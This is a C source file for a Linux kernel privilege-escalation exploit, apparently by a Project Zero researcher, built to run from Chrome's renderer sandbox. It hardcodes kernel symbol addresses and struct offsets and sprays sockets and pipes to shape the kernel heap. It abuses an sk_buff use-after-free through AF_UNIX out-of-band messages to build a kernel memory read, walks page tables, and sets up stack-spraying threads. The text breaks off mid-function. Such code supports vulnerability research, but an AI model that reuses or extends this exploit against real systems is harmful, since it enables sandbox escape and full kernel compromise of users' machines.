// by Jann Horn
// spraying-based strategy for https://project-zero.issues.chromium.org/423023990
// designed to run in Chrome renderer sandbox, where available syscalls are limited

#define _GNU_SOURCE
#include <pthread.h>
#include <stdint.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <sched.h>
#include <stddef.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sched.h>
#include <ctype.h>
#include <poll.h>
#include <inttypes.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>
#include <sys/un.h>
#include <linux/filter.h>
#include <linux/socket.h>
#include <linux/seccomp.h>
#include <linux/userfaultfd.h> // for dev only

// highly kernel-build-specific constants go here.
// assumptions about struct layouts and such are hardcoded further down.
//
// SYSMAP__* values are symbol addresses for one particular kernel build.
// The kernel-text/data ones are used below as "constant + kaslr_offset",
// i.e. they are the addresses before KASLR is applied.
static const unsigned long SYSMAP__asm_exc_divide_error = 0xffffffff81e01030;
static const unsigned long SYSMAP__vmemmap_base         = 0xffffffff825e2598;
static const unsigned long SYSMAP__page_offset_base     = 0xffffffff825e25a8;
static const unsigned long SYSMAP__init_top_pgt         = 0xffffffff82c22000;
static const unsigned long SYSMAP__pcpu_chunk_lists     = 0xffffffff82603b98;
static const unsigned long SYSMAP__pcpu_free_slot       = 0xffffffff82603bf8;
static const unsigned long SYSMAP__net_hotdata          = 0xffffffff82c09a00;
static const unsigned long SYSMAP____per_cpu_offset     = 0xffffffff825f2e20;
static const unsigned long SYSMAP__pgd_list             = 0xffffffff82c35db0;
static const unsigned long SYSMAP____pgtable_l5_enabled = 0xffffffff825e25b8;
static const unsigned long SYSMAP__kmalloc_caches       = 0xffffffff82603c40;
static const unsigned long SYSMAP__init_uts_ns          = 0xffffffff82e1c2a0;
// The next values are small offsets rather than full addresses; cpu_tlbstate
// and pcpu_hot are combined with a per_cpu_offset[] entry before being read.
// NOTE(review): cached_stacks is not referenced in the visible part of the
// file; presumably it is a per-CPU offset as well.
static const unsigned long SYSMAP__cpu_tlbstate         = 0x0000000000035280;
static const unsigned long SYSMAP__pcpu_hot             = 0x00000000000351c0;
static const unsigned long SYSMAP__cached_stacks        = 0x0000000000021360;
// Return address inside do_syscall_64, following the call to x64_sys_call
// (as stated by the symbol name; its use is not visible in this part).
static const unsigned long SYSMAP__do_syscall_64__RETADDR_FROM__x64_sys_call = 0xFFFFFFFF81CED1B2;
// OFFSET__<struct>__<field>: byte offset of <field> inside <struct>.
static const unsigned long OFFSET__page__refcount            = 0x34;
static const unsigned long OFFSET__page__page_type           = 0x30;
static const unsigned long OFFSET__pipe_inode_info__bufs     = 0x98;
static const unsigned long OFFSET__pipe_inode_info__ring_size= 0x5c;
static const unsigned long OFFSET__net_hotdata__skbuff_cache = 0x160;
static const unsigned long OFFSET__pcpu_hot__top_of_stack    = 0x18;
// Number of entries read from the kernel's __per_cpu_offset[] array; also used
// as a modulus on SLUB transaction ids.
static const unsigned long CONFIG_NR_CPUS = 8192; // assumed to be power of two

// 16 MiB expressed in bytes.
static const unsigned long SIZE_16M = 0x01000000;

/*
 * Partial userspace mirror of the kernel's struct sk_buff.
 * Only the members this program needs are named; everything else is opaque
 * padding sized so that the named members land on the offsets given in the
 * inline comments (valid for the targeted kernel build only).
 * Total size of this mirror is 0xd8 bytes.
 */
struct sk_buff {
  struct sk_buff *next;
  char pad0[0x20];
  /* 0x28 */
  char cbpad1[0x1c];
  /* 0x44 */
  unsigned int consumed;
  char cbpad2[0x10];
  /* 0x58 */
  char pad1[0x18];
  /* 0x70 */
  unsigned int len;
  /* 0x74 */
  unsigned int data_len;
  /* 0x78 */
  char pad2[0x0c];
  /* 0x84 */
  unsigned char from_ingress:1, nf_skip_egress:1, decrypted:1, slow_gro:1, csum_not_inet:1, unreadable:1;
  /* 0x85 */
  char pad3[0x3b];
  /* 0xc0 */
  unsigned int end;
  char pad4[4];
  /* 0xc8 */
  unsigned char *head;
  /* 0xd0 */
  unsigned char *data;
};

/*
 * Leading part of the kernel's struct skb_shared_info; the trailing columns
 * give each member's offset and size.
 * The frags[] array is commented out, so sizeof() of this declaration is 0x30
 * rather than the 320 bytes quoted for the full kernel structure.
 */
struct skb_shared_info {
        unsigned char              flags;                /*     0   0x1 */
        unsigned char              meta_len;             /*   0x1   0x1 */
        unsigned char              nr_frags;             /*   0x2   0x1 */
        unsigned char              tx_flags;             /*   0x3   0x1 */
        short unsigned int         gso_size;             /*   0x4   0x2 */
        short unsigned int         gso_segs;             /*   0x6   0x2 */
        struct sk_buff *           frag_list;            /*   0x8   0x8 */
        char union10[0x8];                               /*  0x10   0x8 (opaque) */
        unsigned int               gso_type;             /*  0x18   0x4 */
        unsigned int               tskey;                /*  0x1c   0x4 */
        int                        dataref;              /*  0x20   0x4 */
        unsigned int               xdp_frags_size;       /*  0x24   0x4 */
        void *                     destructor_arg;       /*  0x28   0x8 */
        //skb_frag_t                 frags[17];            /*  0x30 0x110 */
        /* size: 320, cachelines: 5, members: 14 */
};

/*
 * Partial mirror of the kernel's struct pcpu_chunk (percpu allocator chunk).
 * Only base_addr, start_offset, end_offset and nr_pages are named; they are
 * the inputs used to compute a chunk's address range. Offsets are for the
 * targeted kernel build.
 */
struct pcpu_chunk {
  char pad0[0x40];
  /* 0x40 */
  unsigned long base_addr;
  /* 0x48 */
  char pad1[0x1c];
  /* 0x64 */
  int start_offset;
  /* 0x68 */
  int end_offset;
  /* 0x6c */
  char pad2[0xc];
  /* 0x78 */
  int nr_pages;
};

/* Doubly linked list node: two pointers, next first and prev second. */
struct list_head {
  struct list_head *next, *prev;
};

/*
 * Leading members of the kernel's page-table descriptor.
 * With 8-byte longs and pointers: pt_list is at offset 0x08 and pt_mm at
 * offset 0x20. Later members are omitted.
 */
struct ptdesc {
  unsigned long __page_flags;
  struct list_head pt_list;
  unsigned long __page_mapping;
  union {
    struct mm_struct *pt_mm;
  };
  //...
};

/*
 * View of a slab's "counters" word: either the whole unsigned long, its low
 * 32 bits, or the packed inuse/objects/frozen bitfields.
 */
union slab_counters {
  unsigned long counters;
  unsigned int counters_short;
  struct {
    unsigned int inuse:16;
    unsigned int objects:15;
    unsigned int frozen:1;
  };
};
/*
 * Leading members of the kernel's struct slab.
 * With 8-byte longs: slab_cache at 0x08, freelist at 0x20, counters at 0x28.
 * Pointers are stored as unsigned long because they are kernel addresses that
 * are never dereferenced directly from userspace.
 */
struct slab {
  unsigned long __page_flags;
  unsigned long slab_cache;
  char slab_lists_union[0x10];
  unsigned long freelist;
  union slab_counters counters;
};

/*
 * Userspace mirror of the kernel's struct pipe_buffer: one slot of a pipe's
 * ring, consisting of a page pointer, the offset/length of the data within
 * that page, an ops pointer, flags and a private word.
 */
struct pipe_buffer {
  void *page;
  unsigned int offset, len;
  void *ops;
  unsigned int flags;
  unsigned long private;
};

// perform syscall, and treat errors as fatal
//
// Evaluates x exactly once. If the result equals -1 converted to the type of
// x (this also matches MAP_FAILED for pointer-returning calls such as mmap),
// err() reports the stringified expression together with the errno text and
// exits with status 1. Otherwise the macro yields the result of x.
// Relies on the GNU statement-expression and typeof extensions.
// Because the expression text becomes part of the error message, renaming
// variables inside a SYSCHK(...) argument changes the program's output.
#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

/*
 * Print a classic offset / hex / ASCII dump of a memory range to stdout.
 *
 * _data:      start of the range to dump
 * byte_count: number of bytes to dump; 0 prints only the header line
 *
 * Sixteen bytes are shown per line. The final line is padded with spaces in
 * the hex column when fewer than sixteen bytes remain. Only the bytes inside
 * [_data, _data + byte_count) are ever read.
 */
static void hexdump(void *_data, size_t byte_count) {
  const unsigned char *data = _data;

  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (size_t byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    size_t remaining = byte_count - byte_offset;
    size_t line_bytes = remaining > 16 ? 16 : remaining;

    // copy only what is really there; a short last line must not read
    // beyond the end of the caller's buffer
    unsigned char bytes[16] = {0};
    memcpy(bytes, data + byte_offset, line_bytes);

    // worst case: 16 offset digits + 2 spaces + 48 hex + 2 + 16 ASCII + 1 + NUL
    char line[128];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", (unsigned long)byte_offset);
    for (size_t i = 0; i < 16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (size_t i = 0; i < line_bytes; i++) {
      unsigned char c = bytes[i];
      if (isalnum(c) || ispunct(c) || c == ' ') {
        *(linep++) = (char)c;
      } else {
        *(linep++) = '.';
      }
    }
    // this sprintf also writes the terminating NUL for puts()
    linep += sprintf(linep, "|");
    puts(line);
  }
}

// enable Chrome renderer sandbox's seccomp filter to make sure we don't use
// blocked stuff
//
// Loads a raw array of struct sock_filter instructions from the file
// "seccomp_filter.0" in the current directory and installs it with
// seccomp(SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_LOG).
// Any failure (missing file, short read, bad size, syscall error) is fatal.
void enable_sandbox(void) {
  SYSCHK(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));
  int fd = SYSCHK(open("seccomp_filter.0", O_RDONLY));
  struct stat st;
  SYSCHK(fstat(fd, &st));
  if (st.st_size <= 0 || st.st_size % sizeof(struct sock_filter) != 0)
    errx(1, "seccomp_filter.0: unexpected size %lld", (long long)st.st_size);

  char *seccomp_filter = malloc(st.st_size);
  if (seccomp_filter == NULL)
    err(1, "malloc(%lld) for seccomp filter", (long long)st.st_size);

  // keep the read outside of assert() so it still happens with -DNDEBUG
  ssize_t nread = SYSCHK(read(fd, seccomp_filter, st.st_size));
  if (nread != st.st_size)
    errx(1, "seccomp_filter.0: short read (%zd of %lld bytes)", nread, (long long)st.st_size);
  close(fd);

  struct sock_fprog fprog = {
    .len = st.st_size / sizeof(struct sock_filter),
    .filter = (void*)seccomp_filter
  };
  SYSCHK(syscall(__NR_seccomp, SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_LOG, &fprog));

  // the kernel has taken its own copy of the program at this point
  free(seccomp_filter);
}

// Estimate RAM+swap by probing how large a private anonymous mapping the
// kernel is willing to hand out.
// Only meaningful when /proc/sys/vm/overcommit_memory is 0 (OVERCOMMIT_GUESS);
// see __vm_enough_memory() in the kernel.
// Returns the largest page-aligned size (in bytes) for which mmap() succeeded.
unsigned long get_totalram_plus_swap(void) {
  // inclusive search window; both bounds stay page-aligned
  unsigned long floor_bytes = 0;
  unsigned long ceil_bytes = 0x0100000000000000;

  while (floor_bytes != ceil_bytes) {
    // midpoint of the window, rounded up to a page boundary
    unsigned long mid = ((ceil_bytes + floor_bytes) / 2 + 0xfff) & ~0xfffUL;

    void *res = mmap(NULL, mid, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if (res != MAP_FAILED) {
      // this size is fine: release it and search the upper half
      SYSCHK(munmap(res, mid));
      floor_bytes = mid;
      continue;
    }
    // too big: the answer is at least one page smaller
    ceil_bytes = mid - 0x1000;
  }
  return floor_bytes;
}

// NOTE(review): main() declares a local variable with this same name and
// assigns the measured value to that local, so this file-scope variable is not
// written in the visible part of the file.
static unsigned long totalram_plus_swap;

/*
 * Consume roughly unmovable_drain bytes worth of kernel pages.
 *
 * For every 4 KiB page to be consumed, 2 MiB of address space is reserved and
 * one byte inside it is read. Presumably each such read makes the kernel
 * allocate one page-table page for that 2 MiB slot (the "->PTs" note on the
 * size computation) -- TODO confirm against the targeted kernel.
 *
 * The mapping is intentionally never released.
 */
static void drain_unmovable_pages(unsigned long unmovable_drain/*bytes*/) {
  // drain unmovable pages
  // bytes -> number of 4 KiB pages -> that many 2 MiB slots of address space
  unsigned long drain_va_size = unmovable_drain/*bytes*/ / 0x1000/*->pages*/ * 0x200000/*->PTs*/;

  // create VMA with 2M alignment
  // over-allocate by 2 MiB minus one page, round the start up to a 2 MiB
  // boundary, then trim the unused head and tail
  char *drain_area_orig = SYSCHK(mmap(NULL, drain_va_size+0x1ff000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0));
  char *drain_area_orig_end = drain_area_orig + drain_va_size+0x1ff000;
  // mmap results are page-aligned, so clearing bits 12..20 is enough to get a
  // 2 MiB-aligned address
  char *drain_area = (char*)(((unsigned long)drain_area_orig + 0x1ff000) & ~0x1ff000UL);
  if (drain_area != drain_area_orig)
    SYSCHK(munmap(drain_area_orig, drain_area - drain_area_orig));
  if (drain_area + drain_va_size != drain_area_orig_end)
    SYSCHK(munmap(drain_area + drain_va_size, drain_area_orig_end - (drain_area + drain_va_size)));

  // walk the region in 2 MiB steps; the madvise range always starts at
  // drain_area and grows to include the page about to be touched
  for (unsigned long off = 0; off < drain_va_size; off += 0x200000) {
    SYSCHK(madvise(drain_area, off+0x1000, MADV_RANDOM));
    // read fault on the first page of this 2 MiB slot
    *(volatile char *)(drain_area + off);
  }
}

// Assumed geometry of the kernel's skb slab cache on the targeted build:
// objects per slab, and number of per-CPU partial slabs.
static const unsigned long SKB__objs_per_slab = 32;
static const unsigned long SKB__cpu_partial_slabs = 4;
// drain partial slabs that contain preexisting allocations,
// and also drain percpu freelists in the process.
// after this, the active slab contains an unknown number
// of allocated objects.
//
// Implementation: queue (SKB__cpu_partial_slabs + 300) * SKB__objs_per_slab
// one-byte messages on AF_UNIX stream sockets. Whenever a non-blocking send
// does not report exactly one byte, the sending end is closed and a fresh
// socket pair is used for the retry. The receiving ends are never closed
// here, so the queued messages stay allocated.
static void drain_partial_skb_slab_pages() {
  unsigned long objs_to_alloc = (SKB__cpu_partial_slabs + 300) * SKB__objs_per_slab;
  int sockfds[2];
  bool new_sockfd = true;
  for (unsigned long i = 0; i < objs_to_alloc; i++) {
retry:;
    // lazily create the first pair, and a replacement after each failed send
    if (new_sockfd) {
      SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
      new_sockfd = false;
    }
    int res = send(sockfds[1], "A", 1, MSG_DONTWAIT);
    if (res != 1) {
      // close the sending side to free up FD space a bit,
      // but keep the receiving side which the SKBs hang off of.
      close(sockfds[1]);
      new_sockfd = true;
      // retry without advancing i: this iteration has not queued anything yet
      goto retry;
    }
  }
}

// byte offset of the controlled sk_buff inside the pipe page (-1: not found yet)
static int skb_off = -1;
// pipe whose single buffered page overlaps the controlled sk_buff
static int uaf_pipe[2] = { -1, -1 };
// socket pair whose receive side still references the controlled sk_buff
static int uaf_fds[2];
/*
 * semi-arbitrary read.
 * can't read from locations covered by __check_object_size()!
 * but in exchange, it can tolerate unmapped kernel addresses.
 * returns byte value or -1 for "unmapped".
 *
 * The page held in uaf_pipe is swapped for a zeroed page whose sk_buff at
 * skb_off has len=100, data_len=0 and data=kaddr; a peeking MSG_OOB recv()
 * on uaf_fds[0] then returns the byte at kaddr. A recv() failure with EFAULT
 * is reported as -1; every other unexpected outcome terminates the program.
 * The I/O is done outside of assert() so that it still happens under NDEBUG.
 */
static int sarb_readbyte(unsigned long kaddr) {
  //printf("sarb_readbyte(0x%lx) = ", kaddr);
  // take the old page out of the pipe ...
  char old_page[0x1000];
  ssize_t nread = SYSCHK(read(uaf_pipe[0], old_page, 0x1000));
  if (nread != 0x1000)
    errx(1, "sarb_readbyte: short pipe read (%zd)", nread);

  // ... and put a freshly built one in
  char new_page[0x1000] = {0};
  struct sk_buff *skb = (void*)(new_page + skb_off);
  skb->len = 100;
  skb->data_len = 0;
  skb->data = (void*)kaddr;
  ssize_t nwritten = SYSCHK(write(uaf_pipe[1], new_page, 0x1000));
  if (nwritten != 0x1000)
    errx(1, "sarb_readbyte: short pipe write (%zd)", nwritten);

  unsigned char rbyte;
  int res = recv(uaf_fds[0], &rbyte, 1, MSG_OOB|MSG_PEEK);
  if (res == 1) {
    //printf("0x%hhx\n", rbyte);
    return rbyte;
  }
  // the only tolerated failure is a fault on the source address
  int recv_errno = errno;
  if (res != -1 || recv_errno != EFAULT)
    errx(1, "sarb_readbyte: unexpected recv() result %d (errno %d)", res, recv_errno);
  //printf("[FAULT]\n");
  return -1;
}
/*
 * Read len bytes starting at kernel address addr into res_, one byte at a
 * time via sarb_readbyte().
 * Returns 0 on success, or -1 as soon as one byte is reported unmapped (the
 * bytes before it have already been stored in res_).
 */
static int sarb_read(void *res_, unsigned long addr, unsigned long len) {
  unsigned char *res = res_;
  // index has the same type as len, so no signed/unsigned comparison and no
  // int overflow for large lengths
  for (unsigned long i = 0; i < len; i++) {
    int b = sarb_readbyte(addr + i);
    if (b == -1)
      return -1;
    res[i] = (unsigned char)b;
  }
  return 0;
}
/*
 * Compare len bytes at kernel address addr against the buffer expected_.
 * Returns true if all bytes match, false at the first mismatch.
 * An unmapped byte is fatal (exit status 1).
 */
static bool sarb_memeq_checked(void *expected_, unsigned long addr, unsigned long len) {
  const unsigned char *expected = expected_;
  for (unsigned long i = 0; i < len; i++) {
    int b = sarb_readbyte(addr + i);
    if (b == -1)
      errx(1, "sarb_memeq_checked failed read");
    if (b != expected[i])
      return false;
  }
  return true;
}
/* Like sarb_read(), but a failed read terminates the program. */
static void sarb_read_checked(void *dst, unsigned long addr, unsigned long len) {
  int failed = sarb_read(dst, addr, len);
  if (failed != 0) {
    errx(1, "unable to read from 0x%lx", addr);
  }
}
/* Read one unsigned long from kernel address addr; failure is fatal. */
static unsigned long sarb_readl_checked(unsigned long addr) {
  unsigned long value;
  sarb_read_checked(&value, addr, sizeof value);
  return value;
}
/* Read one unsigned int from kernel address addr; failure is fatal. */
static unsigned int sarb_read4_checked(unsigned long addr) {
  unsigned int value;
  sarb_read_checked(&value, addr, sizeof value);
  return value;
}
/* Read a single byte from kernel address addr; failure is fatal. */
static unsigned char sarb_read1_checked(unsigned long addr) {
  unsigned char value;
  sarb_read_checked(&value, addr, sizeof value);
  return value;
}

// difference between the kernel's runtime addresses and the SYSMAP__ values
static unsigned long kaslr_offset;
// runtime address of the kernel's top-level page table
#define kernel_pgd (SYSMAP__init_top_pgt + kaslr_offset)
// runtime bases of the struct page array and of the linear mapping
static unsigned long vmemmap_base, page_offset_base;
/*
 * Translate the address of a struct page into the linear-map address of the
 * 4 KiB page it describes. Assumes 64-byte struct page entries; a misaligned
 * input trips the assertion.
 */
static unsigned long page_to_virt(unsigned long page) {
  assert((page - vmemmap_base) % 64 == 0);
  unsigned long page_index = (page - vmemmap_base) / 64;
  unsigned long byte_offset = page_index * 0x1000;
  return page_offset_base + byte_offset;
}

// nonzero if the kernel runs with 5-level paging
static unsigned int __pgtable_l5_enabled;
// linear-map address of this process's top-level page table
static unsigned long mm_pgd;
/*
 * Walk this process's page tables (through the semi-arbitrary read) for the
 * page containing addr.
 *
 * addr:      virtual address to translate; the low 12 bits are ignored
 * stoplevel: 0 to resolve down to the mapped page, or n > 0 to return the
 *            table that the level-n entry points to. Must be in
 *            [0, number of paging levels).
 *
 * Returns a linear-map address, or -1UL if an entry on the way is not
 * present, or if a huge-page entry is met while stoplevel != 0.
 */
static unsigned long uvirt_to_kvirt(unsigned long addr, int stoplevel) {
  addr = addr & ~0xfffUL;
  int levels = __pgtable_l5_enabled ? 5 : 4;
  // an out-of-range stoplevel would let the walk run past level 0
  assert(stoplevel >= 0 && stoplevel < levels);
  unsigned long table_addr = mm_pgd;
  for (int i=levels-1; true; i--) {
    // lowest address bit that indexes into the table at this level
    unsigned long entry_bits = 12 + 9*i;
    unsigned long idx = (addr >> entry_bits) & 0x1ff;
    unsigned long entry = sarb_readl_checked(table_addr + 8 * idx);
    if ((entry & 1) == 0)
      return -1UL; // present bit clear
    // strip the low flag bits and the masked-out high bits from the entry
    unsigned long target_phys = (entry & (~0xfffUL) & (~0x8880000000000000UL));
    unsigned long target_va = target_phys + page_offset_base;
    if (i != 0 && (entry & (1UL<<7)) != 0) {
      if (stoplevel != 0)
        return -1UL; // hugepage not supported
      // unsigned long shift: the mask can be wider than an int
      return target_va + (((1UL << entry_bits)-1) & addr);
    }
    if (i == stoplevel) {
      return target_va;
    } else {
      table_addr = target_va;
    }
  }
}
/*
 * Resolve addr down to its mapped page and express the result relative to
 * page_offset_base. The -1UL failure value of uvirt_to_kvirt() is not
 * treated specially.
 */
static unsigned long anyvirt_to_phys(unsigned long addr) {
  unsigned long linear_va = uvirt_to_kvirt(addr, 0);
  return linear_va - page_offset_base;
}

// userspace copy of the kernel's __per_cpu_offset[] array
static unsigned long *per_cpu_offset;
/*
 * Read an unsigned long from the current CPU's instance of a per-CPU
 * variable. The read is done twice and bracketed by sched_getcpu() calls; the
 * whole sequence restarts until the CPU stayed the same and both reads agree.
 */
static unsigned long percpu_readl(unsigned long pcpu_addr) {
  for (;;) {
    unsigned long cpu_start = sched_getcpu();
    unsigned long first = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu_start]);

    unsigned long cpu_mid = sched_getcpu();
    if (cpu_mid != cpu_start)
      continue; // migrated during the first read

    unsigned long second = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu_start]);
    if (second != first)
      continue; // value changed underneath us

    unsigned long cpu_end = sched_getcpu();
    if (cpu_end == cpu_mid)
      return first;
    // migrated during the second read: start over
  }
}

// Fixed string made up of 'a' characters.
// NOTE(review): not referenced in the visible part of the file; the macro name
// suggests it is used as the name of an anonymous VMA -- confirm at the use site.
#define ANON_VMA_NAMESTR "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

/* Pairs a kernel-side address (kvirt) with a userspace pointer (uvirt). */
struct ramspam_entry {
  unsigned long kvirt;
  char *uvirt;
};
/*
 * qsort()-style comparator that orders ramspam_entry records by ascending
 * kvirt. Returns -1, 0 or 1.
 */
static int compare_ramspam(const void *a_, const void *b_) {
  const struct ramspam_entry *lhs = a_;
  const struct ramspam_entry *rhs = b_;
  // (greater) - (less) yields exactly 1, 0 or -1 without any subtraction of
  // the addresses themselves
  return (lhs->kvirt > rhs->kvirt) - (lhs->kvirt < rhs->kvirt);
}

// Capacity of bump_entry.bumpsocks[].
#define MAX_BUMPS_PER_ENTRY 4
/*
 * Bookkeeping record that ties a ramspam_entry to a kernel address and up to
 * MAX_BUMPS_PER_ENTRY socket descriptors.
 * NOTE(review): not used in the visible part of the file; num_bumps
 * presumably counts the valid entries of bumpsocks[] -- confirm at the use
 * site.
 */
struct bump_entry {
  struct ramspam_entry *ramspam;
  unsigned long kvirt;
  int num_bumps;
  int bumpsocks[MAX_BUMPS_PER_ENTRY];
};

/*
 * Create an AF_UNIX stream socket pair in bump_socks[] and run two
 * send/receive rounds of a single out-of-band byte through it (the "alloc A"
 * and "alloc B" steps). Any syscall failure is fatal.
 */
static void prep_bump_socks(int bump_socks[2]) {
  char dummy;

  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, bump_socks));
  // round 0 is "alloc A", round 1 is "alloc B"
  for (int round = 0; round < 2; round++) {
    SYSCHK(send(bump_socks[1], "A", 1, MSG_OOB));
    SYSCHK(recv(bump_socks[0], &dummy, 1, MSG_OOB));
  }
}

#define NUM_DRAIN_SOCKS 400
/*
 * Pool of socket descriptors used to queue one-byte messages.
 * sockfds[2k] and sockfds[2k+1] are the two ends of the k-th socket pair;
 * idx is the descriptor currently used for sending. The caller creates the
 * first pair in sockfds[0..1]; later pairs are created on demand.
 */
struct drainsocks {
  int sockfds[NUM_DRAIN_SOCKS];
  int idx;
};
static struct drainsocks drainsocks_normal = {};
//static struct drainsocks drainsocks_adjacent = {};
/*
 * Queue exactly one one-byte message on the pool.
 * If the current descriptor refuses the non-blocking send, move on to the
 * next one (creating a new socket pair whenever an even index is reached) and
 * try again. Returns 0 on success; exhausting the pool is fatal.
 */
static int drain_one(struct drainsocks *drainsocks) {
  while (1) {
    int res = send(drainsocks->sockfds[drainsocks->idx], "A", 1, MSG_DONTWAIT);
    if (res != -1)
      return 0;

    // drain socket is full, use the next one
    drainsocks->idx++;
    if (drainsocks->idx >= NUM_DRAIN_SOCKS)
      errx(1, "drainsocks full :(");
    // A new pair occupies slots idx and idx+1, which are exactly the slots the
    // send above will use next. Storing it at 2*idx would leave those slots
    // unset and would write past the end of sockfds[] once idx reaches
    // NUM_DRAIN_SOCKS/2.
    if ((drainsocks->idx & 1) == 0)
      SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, drainsocks->sockfds + drainsocks->idx));
    // try again
  }
}

/* Thread body that never returns: it just sleeps in pause() over and over. */
static void *dummy_thread_fn(void *dummy) {
  for (;;) {
    pause();
  }
}
// value of pcpu_hot.top_of_stack observed by bogostack_thread_fn()
static unsigned long bogostack_top_of_stack;
// descriptors used to hand control back and forth with bogostack_thread_fn():
// the thread writes to ready_fd and blocks reading continue_fd
static int bogostack_ready_fd = -1, bogostack_continue_fd = -1;
/*
 * Return the current CPU number without touching thread-local state.
 * Executes LSL on segment selector 123 and keeps the low 12 bits of the
 * result. Presumably the kernel stores the CPU number in that segment's
 * limit -- TODO confirm for the targeted kernel.
 */
static unsigned int getcpu_notls() {
  unsigned int p;
  asm volatile("lsl %[seg], %[p]":[p]"=a"(p):[seg]"r"(123));
  return p & 0xfff;
}
// memory area and pipe used only by the disabled ("#if 0") fault-testing code
static char *uffd_mem;
static int stallpipe[2];
// pipe written to by bogostack_thread_fn() in "clobber" mode
static int addr_leak_pipe[2];
// buffer passed as msg_name by bogostack_thread_fn() in "spray" mode
static char bogothread_spray_data[sizeof(struct sockaddr_un)];
// region that slow_mprotect_thread_fn() mprotect()s and that the clobber write
// reads from
static char *mprotect_region;
static size_t mprotect_region_size;
// socket pair used by the sendmsg() in "spray" mode
static int fakeskb_stack_spray_socks[2];
// passed as msg_control (one byte) by the sendmsg() in "spray" mode
static void *fakeskb_ready_detect_map;
// selects what bogostack_thread_fn() does on its next wakeup
static bool bogostack_want_clobber_target = false;
// careful, our TLS is shared with the main thread - errno is unreliable if used
// concurrently and sched_getcpu() will lie due to rseq
//
// Worker that first records its kernel stack top and then performs one
// syscall per request:
//   1. read pcpu_hot.top_of_stack of the CPU it runs on into
//      bogostack_top_of_stack, then signal bogostack_ready_fd
//   2. forever: wait on bogostack_continue_fd, issue either the pipe write or
//      the sendmsg() depending on bogostack_want_clobber_target, then signal
//      bogostack_ready_fd again
// The int(void*) signature presumably means it is started with clone() rather
// than pthread_create() -- the launch site is outside this view.
// Return values of read/write/sendmsg are deliberately not inspected here.
static int bogostack_thread_fn(void *dummyarg) {
  // find thread stack
  unsigned long pcpu_addr = SYSMAP__pcpu_hot + OFFSET__pcpu_hot__top_of_stack;
  //bogostack_top_of_stack = percpu_readl(pcpu_addr);
  // same retry scheme as percpu_readl(), but using getcpu_notls() instead of
  // sched_getcpu()
  while (1) {
    unsigned long cpu1 = getcpu_notls();
    unsigned long res1 = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu1]);
    unsigned long cpu2 = getcpu_notls();
    if (cpu1 != cpu2)
      continue;
    unsigned long res2 = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu1]);
    if (res1 != res2)
      continue;
    unsigned long cpu3 = getcpu_notls();
    if (cpu2 != cpu3)
      continue;
    bogostack_top_of_stack = res1;
    break;
  }

  // tell the controller that bogostack_top_of_stack is valid
  eventfd_write(bogostack_ready_fd, 1);

  unsigned long dummy_ulong;
  while (1) {
    // block until the controller asks for the next operation
    read(bogostack_continue_fd, &dummy_ulong, 8);

    if (bogostack_want_clobber_target) {
      /*
       * At the start of this syscall, the pipe contains capacity-1 pages.
       *
       * This syscall does the following:
       *
       * - write one page (making the pipe full, which will be observable by
       *   polling for POLLOUT)
       * - wait for one page to be removed from the pipe (which will become the
       *   pipe's tmp_page)
       * - add the tmp_page to the end of the pipe and write into it (this is
       *   where we may want to inject a delay)
       */
      write(addr_leak_pipe[1], mprotect_region+0x800, 0x3000);
    } else {
      // one-byte message carrying bogothread_spray_data as the destination
      // address and a one-byte control buffer
      struct iovec iov = {
        .iov_base = "A",
        .iov_len = 1
      };
      struct msghdr msg = {
        .msg_name = bogothread_spray_data,
        .msg_namelen = sizeof(bogothread_spray_data),
        .msg_iov = &iov,
        .msg_iovlen = 1,
        .msg_control = fakeskb_ready_detect_map,
        .msg_controllen = 1
      };
      sendmsg(fakeskb_stack_spray_socks[1], &msg, 0);
    }

    // report completion of this round
    eventfd_write(bogostack_ready_fd, 1);
  }
}

// descriptor the bumper thread blocks on until it is told to go
static int bumper_thread_launch_fd = -1;
// socket pair on which the bumper thread performs its MSG_OOB recv()
static int uaf_write_trigger_fds[2];
/*
 * Thread body: wait for an 8-byte token on bumper_thread_launch_fd, then do a
 * single MSG_OOB recv() on uaf_write_trigger_fds[0] and print its result
 * together with the errno text. Always returns NULL.
 */
static void *bumper_thread_fn(void *dummy) {
  uint64_t dummy_u64;
  SYSCHK(read(bumper_thread_launch_fd, &dummy_u64, sizeof(dummy_u64)));
  // start from a clean errno so that %m below reflects only the recv()
  errno = 0;
  char dummy_char;
  int res = recv(uaf_write_trigger_fds[0], &dummy_char, 1, MSG_OOB|/*nerf for testing*/0);
  printf("bumper thread: recv() returned %d (%m)\n", res);
  return NULL;
}

// descriptor slow_mprotect_thread_fn() blocks on until it is told to go
static int mprotect_launch_fd = -1;
/* Current CLOCK_MONOTONIC time in nanoseconds; a clock failure is fatal. */
static uint64_t time_u64(void) {
  struct timespec ts;
  SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));

